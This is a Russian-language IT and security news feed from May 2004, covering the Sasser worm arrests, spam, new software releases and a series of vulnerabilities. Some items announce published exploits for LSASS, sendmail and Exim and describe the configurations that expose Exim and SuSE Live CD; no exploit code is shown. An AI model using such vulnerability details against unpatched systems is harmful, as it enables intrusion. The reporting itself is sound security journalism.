10/05/2004 14:44 Linux-пользователи Франции за борьбу с пиратством ПО от Microsoft
Французская ассоциация пользователей Linux (AFUL) призывает правительство покончить с пиратством программного обеспечения от таких компаний, как Microsoft. Кроме того, группа Linux-пользователей требует, чтобы в магазинах, где продаются компьютеры с предустановленными пакетами вроде Microsoft Office, отдельно указывалась цена каждой из программы. Таким образом сторонники ПО с открытым кодом хотят, чтобы рядовые покупатели видели то, за что они платят, и, естественно, добиваются соответствующей реакции со стороны потребителей -- изучению свободно распространяемых аналогов в виде Linux и open-source.
nixp.ru

10/05/2004 12:24 Гейтс не остановит спам
Более 80% опрошенных профессионалов по защите компьютерных систем не верят, что «крестовый поход» Билла Гейтса против спамеров является решением проблемы. Билл Гейтс в одиночку не сможет остановить спам, это несерьезно. Опрос специалистов в области компьютерной безопасности был проведен в рамках специализированной конференции Infosecurity 2004, которая проходила в Лондоне с 27 по 29 апреля 2004 г. Участников конференции попросили ответить на вопрос, является ли реалистичным план Билла Гейтса полностью уничтожить спам в течение двух лет. Абсолютное большинство (80%) опрошенных ответили отрицательно. Тем более что уже прошел почти год после объявленного Биллом Гейтсом «крестового похода», а особых успехов что-то не наблюдается. Джон Чейни (John Cheney), директор компании BlackSpider Technologies, которая провела опрос, прокомментировал его результаты так: индустрия не воспринимает компанию Microsoft в качестве влиятельного и авторитетного игрока, способного повлиять на ситуацию в положительную сторону. «Спам не исчезнет сам собой в один прекрасный день, и люди не считают Билла Гейтса человеком, который способен это обеспечить. Нужно принимать целый комплекс технологических и юридических мер», — сказал Чейни. Опрос специалистов на конференции Infosecurity также показал, что 38% из них не верят даже в малейший успех антиспамерской директивы, принятой Евросоюзом. Это неудивительно, потому как известно, что большая часть спама в интернете приходит из-за пределов ЕС, да и директиву Евросоюза поддержали пока лишь немногие государства.
Источник

10/05/2004 12:10 «Кроссплатформенные» MMS
3G Americas и CDMA Development Group (CDG) анонсировали создание универсального стандарта мультимедиа сообщений. Работа с ведущими операторами и производителями сотовых телефонов позволила организациям сформулировать ряд рекомендаций, призванных обеспечит возможность обмена MMS между пользователями сетей разных стандартов, сообщает mobile-review.com «Рекомендации касаются не только сетей третьего поколения, но и обычных GSM сетей»,- заявил Крис Пирсон (Chris Pearson), президент 3G Americas.
Пресс-релиз

10/05/2004 11:16 Ещё один экплоит уязвимости Lsasrv.dll.
Ранее был написан эксплоит уязвимости в библиотеке Lsasrv.dll ОС Windows XP/2K (устраняется установкой патча, описанного в бюллетене Microsoft MS04-011). Изначально он был написан для компиляции на платформе Win32. froggy3s портировал этот исходник для ОС Linux. Судя по всему, оба автора эксплоитов являются нашими соотечественниками.
Исходный текст

10/05/2004 10:26 Награда Microsoft позволила схватить предполагаемого автора Sasser
В субботу Microsoft объявила, что созданный ею для награждения информаторов за сведения об организаторах вирусных атак фонд в $5 млн принёс первые плоды: в Германии арестован человек, признавшийся в том, что именно он выпустил червя Sasser. В ходе «скоординированной международной правоохранительной операции» местные власти арестовали 18-летнего жителя Ротенбурга всего через неделю после появления в интернете первого вируса Sasser. «Спустя 48 часов после поступления информации наши следователи и полиция Германии смогли найти и арестовать распространителя вируса Sasser, — заявил главный юрисконсульт Microsoft Брэд Смит. — Мы считаем, что этот человек является автором всех четырех вариантов вируса Sasser». Арест вирмейкера стал первым успехом программы Microsoft Antivirus Award — фонда в $5 млн, предназначенного для награждения людей, давших информацию о распространителях разрушительных червей и вирусов. Microsoft предложила три награды по $250 тыс. за сведения об ответственных за тот хаос, который навели червь MSBlast, вирус Sobig и вирус MyDoom, однако никаких арестов по этим случаям пока не произведено. Автор второстепенного варианта червя MSBlast был арестован еще до начала программы. Microsoft не объявляла никаких наград за информацию об авторах и распространителях червя Sasser, тем не менее информаторы пришли в среду в германский офис софтверного гиганта и поинтересовались, будет ли выплачена такая награда. «Мы без колебаний приняли решение предложить $250 тыс.», — сказал Смит. Смит не уточнил, сколько пришло людей, сказав лишь, что их было меньше пяти. Он сказал также, что они живут в той же части Германии, но не рассказал о том, каковы отношения между арестованным автором Sasser и этими информаторами. «Это частные лица, которые знают преступника; они не вычислили его в результате технического анализа», — сказал Смит.
Подробности

10/05/2004 10:02 Конкурс на лучшую программу для Pocket PC
Компания HP при поддержке компании "Кварта Технологии" проводит конкурс на лучшую программу для карманных компьютеров HP iPAQ. Прием программ на конкурс проходит с 1 мая по 30 июня 2004 года. Подведение итогов состоится 20 июля 2004 года. Учреждены три номинации: деловые программы, системные утилиты, игры (развлечения). В категории деловых программ будут рассматриваться бизнес приложения, информационные системы, различные учетные системы, системы выездной торговли. Во второй категории участвуют программы, расширяющие стандартные возможности карманных компьютеров: программы синхронизации с бизнес-приложениями для персональных компьютеров, программы реализующие управление самой разнообразной периферией, программы, создающие дополнительные элементы управления самими карманными компьютерами. В категории игр и развлечений будут рассматриваться как непосредственно игры, так и различные развлекательные программы: гороскопы, биоритмы, музыкальные программы.
Подробнее о конкурсе

9/05/2004 17:06 Новая версия почтового клиента Mozilla Thunderbird содержит улучшенные фильтры для борьбы со спамом
Сообщество разработчиков Mozilla.org представило новую версию автономного почтового клиента Mozilla Thunderbird. Новая версия получила порядковый номер 0.6 и отличается от предшествующей версии 0.5 рядом усовершенствований. Во-первых, в версии для Windows появилась традиционная процедура установки. Ранее для установки Thunderbird нужно было распаковать zip-архив и вручную создавать ярлыки для быстрого запуска программы. Кроме того, у Thunderbird 0.6 появился новый логотип, выполненный в едином стиле с логотипом браузера Mozilla Thunderbird. А в версии для Mac OS X появилась новая интерфейсная тема, лучше соответствующая стилистике операционной системы Apple. Кроме того, в почтовой программе были исправлены некоторые ошибки при работе со старыми версиями Microsoft Office и при переносе данных из писем в электронную таблицу из пакета OpenOffice. Наконец, в Thunderbird 0.6 подверглись заметной доработке фильтры спама. По утверждению разработчиков, теперь они быстрее обучаются и более эффективно отлавливают мусорную корреспонденцию. При работе по протоколу IMAP появилась поддержка команды IDLE. С ее помощью сервер может самостоятельно извещать клиентскую программу о появлении в ящике новой почты.
Скачать (7.92 МБ)

9/05/2004 16:56 Уязвимости в Exim
Известный исследователь компьютерной безопасности Georgi Guninski опубликовал сообщение о наличии уязвимости в другом популярном агенте доставки почты (MTA) Exim. Обнаружено 2 уязвимости, приводящие к переполнению буфера в стеке. Первая связана с некорректной обработкой буфера при проверке адреса отправителя в программе verify.c. Атака может буть осуществлена при наличии в конфигурационном файле exim.conf строки "sender_verify = true". Вторая уязвимость обнаружена в программе accept.c и проявляется при наличии "headers_check_syntax" файла exim.conf в версии 3.35, либо "require verify = header_syntax" файла .conf версии 4.32. Автором выпущены как примеры эксплоитов на Perl, так и неофициальный патч.
Описание

9/05/2004 14:50 Эксплоит уязвимости в sendmail
Gyan Chawdhary написал исходный код уязвимости, обнаруженной ранее в sendmail версии до 8.12.9 (была опубликована lcamtuf). Используя уязвимость в функции prescan MTA sendmail, можно локально получить права суперпользователя.
Эксплоит

9/05/2004 14:03 AMD борется с подделками в Азии
Компания Advanced Micro Devices наращивает усилия по борьбе с «перемаркировкой» своих процессоров в Юго-Восточной Азии. Кроме судебного преследования продавцов, замеченных в сбыте перемаркированных процессоров AMD, компания прибегла к дополнительным мерам, которые помогут потребителям и реселлерам отличить подлинные продукты AMD от подделок. Перемаркированные чипы подвергаются нелегальной модификации и переупаковке для продажи под видом более быстродействующих и дорогих процессоров. Теперь чипы, предназначенные для продажи в Юго-Восточной Азии, маркируются специальными наклейками, содержащими серийные номера и имена авторизованных дистрибьюторов в соответствующих странах. «Это не всемирная, а региональная программа, специально для азиатских стран, — сказал CNET Asia представитель компании. — Мы предприняли ее, чтобы потребители знали, что они покупают подлинные изделия AMD». Этот шаг последовал за обнаружением рынка перемаркированных чипов в начале этого года. В феврале AMD провела серию специальных рейдов в Филиппинах. Новой мерой AMD обеспечит дополнительный уровень контроля, помимо штрихкодов, которые наносятся на ее процессоры Athlon XP. Кроме процессоров для настольных ПК и ноутбуков, штрихкоды наносятся и на процессоры Athlon MP для серверов и рабочих станций, чтобы «упростить отслеживание продуктов», сообщила компания.
Подробнее

9/05/2004 13:50 Во Франции достигли скорости передачи данных в 8 Мбит/с по одной линии DSL
Компания Cegetel, первый во Франции альтернативный национальный оператор фиксированной связи, вместе с компанией Alcatel, установил и запустил в эксплуатацию канал DSL с пропускной способностью 8 Мбит/с, который связал две испытательные площадки, расположенные в Париже и Лоне. Эта скорость в четыре раза превышает скорость стандартных услуг DSL и впервые реализуется в реальной операторской сети на территории Франции. В решении компаний Cegetel и Alcatel используется технология SHDSL, которая агрегирует 4 медных пары (каждая по 2 Мбит/с) в едином канале с общей пропускной способностью 8 Мбит/с. Такая агрегация становится возможной, благодаря одновременному использованию технологии SHDSL и технологии инверсного мультиплексирования ATM, реализованной на уровне модемов, установленных у заказчика. Кроме того, в сети установлен мультиплексор Alcatel DSLAM, который легко справляется с потоками данных, передаваемых со скоростью 8 Мбит/с.
Источник

9/05/2004 13:37 Как избавиться от вируса Sasser
Microsoft выпустила специальную утилиту для удаления червя Sasser версий A и B. Системы, на которых не установлено обновление под номером MS04-011 [KB835732], подвержены заражению данным вирусом, сообщает crime-research.ru. "Лаборатория Касперского" также представила бесплатную утилиту для нейтрализации сетевого червя Sasser. Эта программа обнаруживает активную копию червя в памяти компьютера, деактивирует ее, удаляет зараженные файлы с жесткого и сетевых дисков, а также восстанавливает системный реестр Windows, удаляя из него ссылку на Sasser. Таким образом, утилита полностью восстанавливает компьютер и удаляет все следы заражения червем. Также необходимо установить бесплатное обновление от Microsoft.
Утилита удаления
Утилита удаления от Касперского

9/05/2004 12:53 Переход на 64-разрядные ПК произойдет в течение двух лет
Массовый переход на 64-разрядные процессоры в персональных компьютерах может случиться заметно раньше предполагавшегося срока. По мнению аналитиков компании Meta Group, большинство пользователей пересядут за компьютеры с 64-разрядными процессорами к 2006 году. Что касается серверов, то здесь, по словам Стива Клейнханса из Meta Group, переход на 64-разрядные процессоры ожидается уже к середине 2005 года. Большую роль в этом сыграют как растущая популярность серверов на процессорах AMD Opteron, так и выпуск компанией Intel 32-разрядных чипов с 64-разрядными расширениями. Другие аналитические агентства предсказывают более медленный переход на 64-разрядные процессоры. В частности, в компании Dataquest полагают, что переход на них займет не менее четырех лет, однако в Meta Group считают иначе. Компания AMD уже вовсю поставляет 64-разрядные процессоры для настольных ПК, и, по мнению аналитиков, так поступит и Intel. Определяющим для успеха 64-разрядных процессоров может стать выпуск поддерживающей их модификации ОС Windows XP, который намечен на конец нынешнего года. По мнению аналитиков Meta Group, к концу 2005 года все 100% поставляемых AMD процессоров для настольных ПК будут 64-разрядными. Intel, в свою очередь, к этому времени будет поставлять как 32-разрядные, так и 64-разрядные процессоры с преобладанием последних, полагает Клейнханс.
Подробности

9/05/2004 11:49 Русский хакер внедрил тестовый вредоносный код в KDE
В понедельник, 3 мая, русский хакер внедрил в исходный код KDE небольшое тестовое сообщение, целью которого была проверка “насколько надежен метод разработки свободного софта и таких вещей, как совместная работа многих разработчиков и внесения ими множества изменений в код”, cообщает securitylab.ru. Сообщение обнаружили спустя полтора часа после его внедрения. Полный текст внедренного сообщения: "Извините, конечно, за такую тупость, но мне просто стало интересно, насколько надежен метод разработки свободного софта и таких вещей, как совместная работа многих разработчиков и внесение ими множества изменений в код. Главная моя цель - узнать, насколько долго могут остаться незамеченными внедренные вредоносные коды. В тексте выше используется сохраненный пользователем пароль, поэтому можно было бы внедрить сюда вредоносный код. Но это уже уголовщина какая-то, поэтому я просто пишу тут невинный текст. Пользуясь, случаем, передаю привет: 1) ЛОРу (имелся в виду linux.org.ru? - прим. ньюсмейкера). 2) Самой лучшей девушке на земле - моей дорогой Кумке".
Подробности

9/05/2004 11:07 Арест автора Sasserа был не единственным
Как выяснилось в пятницу немецкой полицией был арестован не только 18-летний подозреваемый в написании Sasser'а (что, кстати, произошло не без помощи охотников за наградой, объявленной Microsoft), но и 21-летний автор еще одного червя ("Agobot", в поздних версиях "Phatbot"), сообщает bugtraq.ru. Были ли они как-то связаны между собой, пока не сообщается. Полиция лишь утверждает, что автор Phatbot использовал Sasser для распространения своего вируса.
Подробности

8/05/2004 14:18 Генпрокуратура США начинает расследование "Виртуального Уотергейта"
По заявлению сенатора-демократа Патрика Лихи (Patrick J. Leahy), Министерство юстиции США начинает расследование инцидента, получившего название "Виртуальный Уотергейт", пишет Los-Angeles Times. Внутреннее расследование в Сенате показало, что два республиканца проникли в компьютеры своих коллег-демократов и скачали более 4600 архивных файлов, относящихся к 2001-2003 годам. "Это очень серьезный случай, требующий самого тщательного разбирательства. Парламентский пристав положил хорошее начало своим расследованием и докладом", - сказал Лихи. В докладе по итогам внутреннего расследования названы имена подозреваемых - это Мануэль Миранда (Manuel Miranda) и Джейсон Ланделл (Jason Lundell). Ландел, сотрудник одного из парламентских комитетов, нашел способ проникнуть в компьютерные архивы демократов и скачал оттуда 4670 различных документов, распечатал их и передал Миранде. Через некоторое время документы попали в руки журналистов, которые отказались назвать источник получения этой ценной информации, но несколько сотрудников Конгресса указывают на Миранду, как на источник утечки.
Источник

8/05/2004 14:06 Уязвимость в SuSE Live CD 9.1
Вышедший недавно SuSE Live CD 9.1 содержит ошибку в конфигурации, позволяющей заходить удалённо по ssh с правами root без ввода пароля, cообщается на linux.org.ru.
Подробности

8/05/2004 13:04 Появилось еще одно подтверждение недолговечности CD
В сентябре 2003 года нидерландский журнал PC-Active опубликовал результаты собственных экспериментов, результаты которых вызвали большой резонанс в компьютерной индустрии. Сотрудники журнала измеряли реальный срок службы CD-R. Они доказали, что уже через 20 месяцев информация, записанная на компакт-диск читается с трудом, а на некоторых дисках вообще становится недоступной. Результаты ошеломляющие, так как заявленное время жизни многих "болванок" - около 10 лет бесперебойной работы. Сейчас недолговечность компакт-дисков получила новое подтверждение. Американец Дэн Костер после переезда начал распаковывать коробки с коллекцией из 2000 дисков и был неприятно удивлен. Около 20 процентов дисков были испорчены. И пострадал именно слой, на который записана информация. Теоретически он должен быть надежно защищен слоем пластика, но в данном случае Костеру видимо не повезло с производителем. Костер жалуется, что диски как будто прогнили изнутри. Коррозию может вызвать небрежное покрытие алюминиевой пленки пластиком при производстве диска, что ведет к разрушению диска влагой и воздухом.
Результаты

8/05/2004 12:03 В Германии задержан предполагаемый автор червя Sasser
В пятницу в Германии в земле Нижняя Саксония задержан 18-летний школьник, подозреваемый в создании интернет-червя Sasser, вызвавшего в начале мая очередную эпидемию. Предполагаемый автор червя проживал с родителями в местечке Ваффензен под Ротенбургом. Как сообщает Associated Press со сслыкой на представителя местного угрозыска, в ходе обыска дома у подозреваемого были обнаружены доказательства его причастности к созданию вируса. По мнению экспертов компании Symantec, автор Sasser'а может быть ответственнен и за появление очередной разновидности почтового червя Netsky.
Подробности

7/05/2004 14:06 Растет число случаев интернет-мошенничества
Растущее число случаев интернет-мошенничества может угрожать развитию электронной коммерции. Об этом предупреждает аналитическая компания Gartner. Она сообщает, что согласно ее исследованию более 57 млн американцев считают, что они были обмануты интернет-мошенниками. Более 30 млн - уверены в этом и 27 - не совсем уверены. Интернет-мошенничество или "фишинг" - вид преступления, который все более распространяется в интернет. Суть мошенничества заключается в том, что для похищения личных или коммерческих данных, номеров кредитных карт и т.п., пользователю предлагается заполнить анкету, которая выглядит как официальная форма банка или платежной системы. Gartner сообщает, что более 11 млн кликали по линкам в мошеннических письмах. И что поразительно, нашлось более двух миллионов пользователей, которые заявили, что они действительно заполняли форму и указывали номера своих кредитных карт на сомнительных сайтах. Согласно Gartner за последние шесть месяцев число инцидентов значительно возросло, на 92% по сравнению со всем прошлым годом.
Источники: theinquirer.net, news.com.com

7/05/2004 13:26 Network Associates и Check Point выпустили совместный продукт
Две антивирусные компании Network Associates и Check Point Software выпустили совместный продукт для обеспечения интернет безопасности рассчитанный на малый бизнес. Эта система, которая будет известна под названием Secure-1 и будет продаваться как часть линейки McAfee, совмещает в себе один из наиболее быстрых продуктов Check Point и существующий у McAfee сервис защиты от вирусов - VirusScan ASaP. Компани заявили , что выпущенный продукт поможет мелким компаниям модернизировать вирусную защиту с помощью автоматического и настраиваемого инернет-шлюза и обеспечения безопасности настольных PC. Secure-1 поможет пользователям оставаться всегда готовыми к отражению опасностей из-за встроенной функции автоматического обновления пользовательских фаерволов и антивирусных баз без вмешательства специалиста. Т.к. небольшие компании обычно не имеют возможности держать в штате IT-специалиста, отвечающего за вопросы компьютерной безопасности, производители надеятся, что новый продукт позволит их пользователям сфокусировать свое внимание на более важных для них вещах и не волноваться за безопасность.
news.com.com

7/05/2004 13:03 Apple выпустил патч для Mac OS X
Apple Computer выпустил заплатку для OS X закрывающую критические уязвимости в AFP (Appletalk Filing Protocol)Server, CoreFoundation, и IPSec (Internet Protocol, Secure), которые позволяли атакующему получить контроль над удаленной машиной, увеличить привелегии и отключать сервисы. Уязвимость в AFP позволяла путем переполнения буфера выполнить произвольный код на машине-жертве с привелегиями администратора. Две уязвимости в реализации IPSec протокола позволяли провести man-in-the-middle атаку и неавторизованный доступ. Secunia оценила уязвимости в AFP как критичные, хотя Apple описала свой патч как "улучшение для обработки длинных паролей". Chris Wysopal, представитель @Stake, обнаруживший уязвимости, раскритиковал Apple за неполную информацию, предоставляемую конечным пользователям, о серьезности уязвимостей.
Источники: esecurityplanet.com, techworld.com, zdnet.com.com

7/05/2004 13:02 Вирусы распространяются через IM
Когда речь идет о интернет червях или вирусах все внимание прежде всего уделяют электронной почте, но IM-клиенты, которые стоят повсеместно и дома и в офисе, также являются превликательной и легкой целью для вирусо-писателей. Согласно отчета Symantec Corp., с 2002 по 2003 годы, количество червей и вирусов, распространяющихся через IM-клиенты и P2P сети выросло на 400%. И уже в этом году появились черви Jitux.A и Bizex поражающие MSN Messenger и ICQ соответственно. Jitux.A распространял себя получая и изменяя IM-контакты пользователя. Bizex же имел более злобные намерения, он посылал пользователю линк на сайт, где ваш компьютер сканировался на наличие данных о электронных платежах. Вскоре после обнаружения вируса, это сайт был закрыт, но кто знает, сколько информации уже было им собрано? Ожидается что эта угроза будет расти. Поскольку пользователи хорошо знают как бороться с классическими атаками вирусов, вирусо-писатели ищут другие цели, сказал Билл Адлер (Bill Adler), президент CyberScrub LLC, компании-разработчика ПО компьютерной безопасности. "IM-клиенты, по многим причинам, более подходящая цель." Но пока не стоит выбрасывать свой IM-клиент. Т.к. многие вирусы и черви, имеющие этот путь распространения, не устанавливаются автоматически, они требуют чтобы пользователь сам кликнул на линк или скачал апплет.
computerworld.com

7/05/2004 11:53 ФБР наступает на пятки автору вируса Sasser Windows
Американские власти начали расследование с целью добраться до создателя вируса Sasser Windows, который на этой неделе поразил более миллиона компьютеров во всем мире. Код червя анализируют эксперты, надеющиеся найти зацепки, по которым следователи смогут выйти на программиста или программистов, написавших программу. При этом, по оценкам некоторых специалистов в области компьютерной безопасности, есть вероятность, что Sasser - это дело рук российских хакеров. Больше всего от нового вируса страдают домашние компьютеры и небольшие фирмы, хотя серьезные проблемы испытывают и некоторые крупные компании. По словам представительницы компании Microsoft, ФБР "разбирает на части" код вируса с целью обнаружить в нем информацию, указывающую на создателя червя. Между тем, финская антивирусная фирма F-Secure опубликовала анализ двух вирусов - Sasser.D и Netsky.V - и заявила, что между ними существуют некоторые аналогии. Эта работа, правда, вряд ли поможет правоохранительным органам выйти на создателя последнего вируса, поскольку авторы 29 вариаций Netsky тоже до сих пор не найдены. Уже в среду количество сообщений о заражении Sasser резко пошло на спад, из чего явствует, что пик активности вируса уже позади. Однако некоторые антивирусные фирмы предупреждают: успокаиваться рано. "Есть опасения того, что отдача от червя Sasser может длиться еще не один месяц, - говорит Грэм Клули, старший технолог компании Sophos. - В большой опасности находятся новые компьютеры, не имеющие защиты". По словам Клули, новые компьютеры зачастую обеспечиваются защитой от вирусов только через девять месяцев после того, как эти вирусы наносят свои первые удары.
Источник

7/05/2004 11:39 Десять наиболее активных вирусов апреля
Испанско-российская антивирусная компания Panda Software, пронанлизировав результаты сканирования файлов, предоставляемого бесплатной онлайн утилитой Panda ActiveScan, пришла к выводу, что в апреле текущего года наибольшее количество заражений пришлось на 5 версий червя Netsky. Netsky.P, ответственный за 15,29% заражений, возглавляет апрельский рейтинг вредоносных кодов. Это определила в основном его способность распространяться не только через электронную почту, но также и через файлы с открытым доступом. Netsky P также использует уязвимость Iframe в Internet Explorer, которая позволяет ему автоматически запускаться на компьютерах пользователей. Немного отстает от Netsky.P версия Netsky.D, за ней следует троян Downloader.L, который месяц за месяцем продолжает заражать значительное число компьютеров. Далее идут Netsky.B, Nachi.B и Netsky.C, - три вируса, которые ассоциируются с текущей волной вредоносных кодов. Однако троян Revop.F, впервые обнаруженный в начале марта, постепенно становится более чем угрозой и уже занимает седьмое место в десятке прошедшего месяца. Этот вредоносный код загружает adware на компьютер пользователя.
Подробный отчёт

7/05/2004 11:27 У Longhorn будет три графических интерфейса
В новой операционной системе Longhorn, разрабатываемой корпорацией Microsoft, будут реализованы стразу три типа графических интерфейсов, cообщвет "Компьюлента". Об этом во время проходящей в Лас-Вегасе конференции WinHEC 2004 рассказал ведущий менеджер по разработке Windows Грег Салливан. По его словам, то, какой именно интерфейс будет использоваться, зависит от аппаратных возможностей компьютера. Обладающий наибольшим числом спецэффектов интерфейс Aero Glass будет доступен только обладателям ПК с мощными трехмерными видеокартами. Для работы данного интерфейса потребуется карта, совместимая с DirectX 9, имеющая на борту не менее 64 Мб собственной памяти и базирующаяся на интерфейсе AGP 4x. Менее навороченный вариант интерфейса под названием Aero будет работать на картах с объемом видеопамяти не менее 32 Мб. Совместимость с DirectX 9 и использование AGP 4x также являются обязательными. Пользователям компьютеров с менее мощной видеоподсистемой придется довольствоваться классическим интерфейсом в стиле Windows 2000, лишенным эффектов, требующих присутствия трехмерного ускорителя. Именно в таком режиме, скорее всего, будут работать большинство офисных компьютеров. Вместе с тем, точные аппаратные требования Longhorn до сих пор неизвестны. В Microsoft проводят консультации с ведущими поставщиками компьютерного оборудования и обещают, что новая ОС будет нормально работать на большинстве компьютеров, которые будут продаваться на момент ее выхода в свет.
Подробности

7/05/2004 11:03 Sun выпускает Java Desktop System Release 2
Компания Sun Microsystems выпускает Java Desktop System Release 2 -- новую версию операционной системы для настольных (и корпоративных) компьютерных систем. JDS R2 основывается на операционной системе Linux, а именно на SuSE SLED. Среди программного обеспечения во второй релиз Java Desktop System вошла графическая оболочка GNOME, офисный пакет StarOffice 7, web-браузер Mozilla, клиент для обмена мгновенными сообщениями GAIM, программа для работы с почтой и календарем Evolution.
Источник

7/05/2004 10:29 "Домонет" (Москва) фильтрует трафик
"Телекоммуникационная компания РА", предоставляющая услуги широкополосного ethernet-доступа под торговой маркой "Домонет", сообщает, что для повышения безопасности сети осуществляется фильтрация трафика по следующим портам: TCP/25, TCP/135-139, TCP/445, UDP/135-139. Состав защищаемых портов вполне очевиден и должен защитить от сканирования незащищенные Windows-машины из сети Интернет.
Источник

7/05/2004 10:13 Novell выпустила опытную версию Mono
Проект open source, находящийся под покровительством Novell, воссоздаёт среду программирования Microsoft .Net для Linux- и Unix-систем. Novell унаследовала проект Mono в результате прошлогоднего приобретения производителя ПО open source Ximian. Этот проект был основан в 2001 году программистом Мигелем Деиказой. Цель Mono заключается в том, чтобы позволить программистам .Net создавать приложения, работающие с операционными системами Windows, Linux и Unix. Microsoft, разработавшая .Net Framework, сделала код .Net доступным только для Windows. Программное обеспечение .Net содержит инструменты программирования и структуру .Net Framework, программную среду, устанавливаемую на машины Windows, которые должны исполнять приложения .Net. Проект Mono использует опубликованные спецификации .Net для воссоздания этой среды на платформах Linux и Unix. С тех пор как Novell приобрела Ximian, за ее планами в отношении проекта Mono, тесно связанного с усилиями конкурентов Microsoft, пристально следят. Прошлой осенью тестовая версия Mono, выпуск которой первоначально планировался на конец 2003 года, была отложена. Согласно опубликованному компанией графику, вторая тестовая версия Mono выйдет в начале июня, а финальная версия должна появиться в конце июня.
Тестовая версия Mono

6/05/2004 16:44 Идентификация атак червя Sasser при помощи snort.
Martin Overton опубликовал идентификаторы, обнаруженные при попытке атаки червем Sasser (модификации a и b). Эти идентификаторы (сигнатуры, слепки) могут быть использованы администраторами серверов для определения попытки атаки с использованием популярной системы определения и идентицикации попыток атак (IDS) snort.
Описание

6/05/2004 16:03 В Британии арестованы российские онлайн-мошенники
Британская полиция арестовала 12 выходцев из стран бывшего Советского Союза, которые подозреваются в том, что они обманным путем переводили сотни тысяч фунтов с банковских счетов в Великобритании на счета российской преступной группы. Среди задержанных, имена которых не называются, - граждане России, Украины, Латвии и Эстонии. В посланиях были ссылки на интернет-страничку, выглядевшую как часть официального сайта банка, где клиентам предлагалось заполнить анкету и ввести номера кредитных карточек и пароли. Жертвами хакеров стали клиенты крупнейших британских банков, в том числе Barclays, Lloyds TSB и NatWest. Полиция предполагает, что задержанные были лишь "рабочими лошадками", нанятыми одной из российских преступных групп и получашими лишь определенный процент от похищенных средств. Как утверждают в полиции, эта группа неоднократно пыталась напрямую проникнуть в компьютерные системы крупных банков, и когда ей это не удалось, решила прибегнуть к "фишингу". По данным Рейтер, только в 2003 году эта разновидность мошенничества принесла британским банкам ущерб в размере 60 млн. фунтов (108 млн. долларов).
Источник

6/05/2004 14:14 Черви приносят огромный доход разработчикам антивирусов
Увеличивающиеся атаки червей и вирусов настоящая чума для интернет пользователей. Однако антивирусным компаниям они приносят огромный доход. Сатья на securitypipeline.com рассказывает об этом на примере двух антивирусных гигантов Symantec Corp. и Network Associates Technology Inc., которые закончили прошедший финансовый год с уверенным ростом. Symantec сообщила об увеличении дохода на 33% по сравнению с прошлым годом. Аналогичные показатели и у Network Associates.
securitypipeline.com

6/05/2004 14:06 Microsoft вводит спам-листы и разрешает рассылать спам
Microsoft вводит белые спам-листы которые будут позволять фирмам рассылать спам пользователям Hotmail и MSN. Фирмы, желающие воспользоваться этой возможностью, должны заплатить $20,000, после чего гарантируется что их письма не будут блокироваться спам-фильтрами Microsoft-а. Эта программа, которую Microsoft разработал совместно с IronPort, позволит рассылать письма более чем 170 млн пользователям Hotmail и MSN. Однако, утверждается, что такая кореспонденция будет проверяться независимой группой TRUSTe на соответствие американскому анти-спамовому закону "CAN-SPAM Act". Фирмы, нарушающие его, могут лишиться денег и права рассылать свои письма.
www.infosecnews.com
www.theinquirer.net

6/05/2004 13:53 Австралийский студент сломал авторизацию в iTunes
Давид Хаммертон (David Hammerton), 20-ти летний австралийский студент, исследовал механизм аутентификации в iTunes и нашел способ подключать сторонних клиентов к серверам Apple. Он уже второй раз ломает авторизацию iTunes. Первый раз для нахождения решения ему понадобилось около недели. Затем, новый продукт iTunes 4.5 был пропатчен. Но Давиду потребовалось всего восемь частов чтобы сломать и его. Алгоритм аутентификации в iTunes основывается на использовании MD5 - контрольной суммы. Разработчики Apple модифицировали алгоритм MD5 так, чтобы первый крак Хаммертона не работал и назвали его "iMD5". Однако, Хаммертон разобрал алгоритм и модифицировал свой крак. Apple отказался от комментариев.
securityfocus.com

6/05/2004 13:51 Microsoft: утилиту для уничтожения Sasser скачали уже более 1.5 млн раз
За два дня более 1.5 миллионов пользователей Windows скачали утилиту для уничтоженя интернет червя Sasser, которую Microsoft опубликовала в воскресенье. Количество скачиваний это некоторый показатель числа инфицированных Sasser компьютеров, и это число значительно больше чем ожидали компании занимающиеся информационной безопасностью, сказал представитель Microsoft. Однако общее число зараженных компьютеров может быть гораздо больше, особенно если брать во внимание компьтеры в локальных сетях.
computerworld.com

6/05/2004 11:21 ФБР открыло "охоту" на авторов червя Sasser
Федеральное бюро расследований США начало "охоту" на авторов вредоносной программы Sasser, эпидемия которой началась во Всемирной сети 1 мая. Червь Sasser, напомним, способен поражать компьютеры, работающие под управлением операционных систем Microsoft Windows 2000 и Windows ХР, используя дыру в локальной подсистеме аутентификации пользователей (LSASS). Несмотря на то, что данные о количестве зараженных машин серьезно варьируются, эксперты полагают, что на сегодняшний день инфицировано не менее миллиона ПК. Кстати, в течение всего двух суток с момента появления вируса специально созданную Microsoft страничку с описанием способов защиты от возможных атак посетили более полутора миллионов человек. Специалисты по вопросам компьютерной безопасности и правоохранительные органы, между тем, начали расследование с целью поимки создателей червя. В частности, по словам представителей финской компании F-Secure, проанализировавшей коды Sasser.D и Netsky.V, между двумя этими вирусами есть заметные сходства. Впрочем, вряд ли данная информация действительно поможет выйти на след злоумышленников, поскольку о создателях уже почти 30 модификаций вредоносной программы Netsky не известно ровным счетом ничего.
Источник

6/05/2004 10:53 Опасная ошибка в мобильном телефоне Siemens
Немецкая группа Phenoelit объявила об ошибке, найденной в телефоне Siemens S55, которая позволяет рассылать SMS-сообщения без разрешения владельца телефона. Хотя телефон запрашивает разрешение на отсылку SMS-сообщений, но стороннее Java-приложение может перехватить и самостоятельно обработать этот запрос. Телефон Siemens S55 оснащён виртуальной машиной Java для работы на уровне Java API. При помощи подобного API можно написать приложение, создающее "личный экран", который как раз может перкрыть сообщение о посылке сообщения. К сообщению приложен примерный Java-код приложения, которое позволило бы использовать эту ошибку. В сообщении указано, что код действует только на Siemens S55, но для других телефонов он не проверялся. Ошибка создает основу для разработки троянских программ для мобильных телефонов.
Подробности

6/05/2004 10:37 Microsoft представила новые антипиратские средства
